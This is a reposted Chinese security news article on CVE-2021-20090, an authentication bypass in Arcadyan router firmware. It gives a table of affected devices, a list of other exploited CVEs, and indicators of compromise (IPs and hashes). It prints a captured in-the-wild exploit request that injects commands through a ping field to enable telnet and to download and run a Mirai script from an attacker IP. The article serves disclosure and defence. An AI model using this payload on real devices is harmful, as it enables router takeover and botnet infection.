CVE-2021-20090是一個由Tenable發(fā)現(xiàn)并在2021年8月3日公布的漏洞?,F(xiàn)在,研究人員發(fā)現(xiàn)了其正在被在野利用。
該漏洞是一個路徑繞過漏洞,可導(dǎo)致認(rèn)證繞過,攻擊者可以利用其接管受影響設(shè)備的控制權(quán)。
根據(jù) Tenable 的相關(guān)信息披露,CVE-2021-20090 漏洞被發(fā)現(xiàn)實(shí)際存在于 Arcadyan 固件中,這不僅影響了最初發(fā)現(xiàn)的 Buffalo 路由器,還影響了更多的設(shè)備。
影響范圍如下所示:
廠商 | 設(shè)備 | 版本 |
---|---|---|
ADB | ADSL wireless IAD router | 1.26S-R-3P |
Arcadyan | ARV7519 | 00.96.00.96.617ES |
Arcadyan | VRV9517 | 6.00.17 build04 |
Arcadyan | VGV7519 | 3.01.116 |
Arcadyan | VRV9518 | 1.01.00 build44 |
ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |
ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |
ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |
ASUS | DSL-AC3100 | 1.10.05 build503 |
ASUS | DSL-AC68VG | 5.00.08 build272 |
Beeline | Smart Box Flash | 1.00.13_beta4 |
British Telecom | WE410443-SA | 1.02.12 build02 |
Buffalo | WSR-2533DHPL2 | 1.02 |
Buffalo | WSR-2533DHP3 | 1.24 |
Buffalo | BBR-4HG | |
Buffalo | BBR-4MG | 2.08 Release 0002 |
Buffalo | WSR-3200AX4S | 1.1 |
Buffalo | WSR-1166DHP2 | 1.15 |
Buffalo | WXR-5700AX7S | 1.11 |
Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |
HughesNet | HT2000W | 0.10.10 |
KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |
KPN | VGV7519 | 3.01.116 |
O2 | HomeBox 6441 | 1.01.36 |
Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |
Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |
SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |
Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |
TelMex | PRV33AC | 1.31.005.0012 |
TelMex | VRV7006 | |
Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |
Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |
Telus | NH20A | 1.00.10debug build06 |
Verizon | Fios G3100 | 1.5.0.10 |
Vodafone | EasyBox 904 | 4.16 |
Vodafone | EasyBox 903 | 30.05.714 |
Vodafone | EasyBox 802 | 20.02.226 |
Juniper 威脅實(shí)驗室近期也發(fā)現(xiàn)攻擊者正在在野利用編號為 CVE-2021-20090 的身份驗證繞過漏洞,攻擊者通過其傳播 Mirai 惡意軟件。
POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark
action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;
wget+http://212.192.241.72/lolol.sh;
curl+-O+http://212.192.241.72/lolol.sh;
chmod+777+lolol.sh;
sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
不止 CVE-2021-20090,新發(fā)現(xiàn)的攻擊團(tuán)伙也頻繁利用新漏洞擴(kuò)充軍火庫:
CVE-2020-29557(DLink routers)
CVE-2021-1497(Cisco HyperFlex)
CVE-2021-1498(Cisco HyperFlex)
CVE-2021-31755(Tenda AC11)
CVE-2021-22502(MicroFocus OBR)
CVE-2021-22506(MicroFocus AM)
exploit-db 未分配 CVE 編號但存在 PoC 的 exploit
27.22.80.19
212.192.241.72
9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78
73edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d
8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399
f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58c
e4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa9529
80331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528
904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc
283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582
c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e
70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20
文章轉(zhuǎn)載自FreeBuf.COM